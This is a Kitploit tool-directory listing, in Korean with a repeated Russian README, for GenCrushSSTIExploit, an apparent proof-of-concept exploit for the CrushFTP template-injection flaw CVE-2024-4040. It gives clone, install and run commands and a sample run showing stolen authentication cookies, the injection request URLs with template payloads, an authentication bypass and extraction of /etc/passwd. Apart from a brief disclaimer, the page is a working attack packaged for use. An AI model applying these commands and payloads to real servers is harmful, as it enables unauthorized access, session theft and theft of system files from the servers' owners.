Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
GenCrushSSTIExploit — CVE-2024-4040에 대한 PoC로, CrushFTP의 SSTI 취약점을 악용하는 도구입니다. | Kitploit
도구/GitHubGitHub/geniuszly/gencrushsstiexploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

CVE-2024-4040에 대한 PoC로, CrushFTP의 SSTI 취약점을 악용하는 도구입니다.

저장소 보기
811년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenCrushSSTIExploit는 CrushFTP의 SSTI(서버 측 템플릿 인젝션) 취약점 CVE-2024-4040을 대상으로 하는 PoC 익스플로잇 도구입니다. 이 도구는 교육 및 윤리적 해킹 목적을 위해 해당 취약점을 어떻게 악용하는지 보여줍니다.

기능

  • CrushFTP 서버와 세션을 설정하여 인증 쿠키를 추출합니다.
  • SSTI 취약점을 악용하여 페이로드를 주입합니다.
  • 인증을 우회하고 서버에서 민감한 파일을 추출하려고 시도합니다.
  • 콘솔 출력을 아름답고 스타일리시하게 만들기 위해 rich를 사용합니다.

면책 조항

⚠️ 이 도구를 책임감 있게 사용하세요! 연구 및 교육 목적으로만 사용됩니다. 저자는 이 도구의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.

설치

사전 요구 사항

  • Python 3.7+
  • pip (Python 패키지 설치 관리자)

저장소 클론

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

필수 패키지 설치

root@kitploit:~
pip install -r requirements.txt

사용법

기본 명령어

root@kitploit:~
python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: 취약한 CrushFTP 서버의 대상 URL을 지정합니다.

선택적 매개변수

  • -l / --lfi: 로컬 파일 포함. 추출할 파일을 지정합니다.
  • -w / --wordlist: 파일 경로를 브루트포싱하기 위한 워드리스트를 지정합니다.

예제

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

출력 예시

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...

RU

GenCrushSSTIExploit — это PoC инструмент эксплуатации уязвимости SSTI (Server-Side Template Injection) в CrushFTP CVE-2024-4040. Этот инструмент демонстрирует, как использовать данную уязвимость в образовательных и этических целях.

Возможности

  • Устанавливает сессию с сервером CrushFTP для извлечения куки аутентификации.
  • Эксплуатирует уязвимость SSTI для внедрения полезных нагрузок.
  • Пытается обойти аутентификацию и извлечь конфиденциальные файлы с сервера.
  • Использует rich для красивого и стилизованного вывода на консоль.

Отказ от ответственности

⚠️ Используйте этот инструмент ответственно! Он предназначен только для исследований и образовательных целей. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.

Установка

Предварительные требования

  • Python 3.7+
  • pip (менеджер пакетов Python)

Клонирование репозитория

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Установка необходимых пакетов

root@kitploit:~
pip install -r requirements.txt

Использование

Основная команда

root@kitploit:~
python GenCrushSSTIExploit.py -t <ЦЕЛЕВОЙ_URL>
  • -t / --target: Указывает целевой URL уязвимого сервера CrushFTP.

Дополнительные параметры

  • -l / --lfi: Включение локального файла. Указывает файл для извлечения.
  • -w / --wordlist: Указывает словарь для перебора путей к файлам.

Пример

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Пример вывода

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
도구 다운로드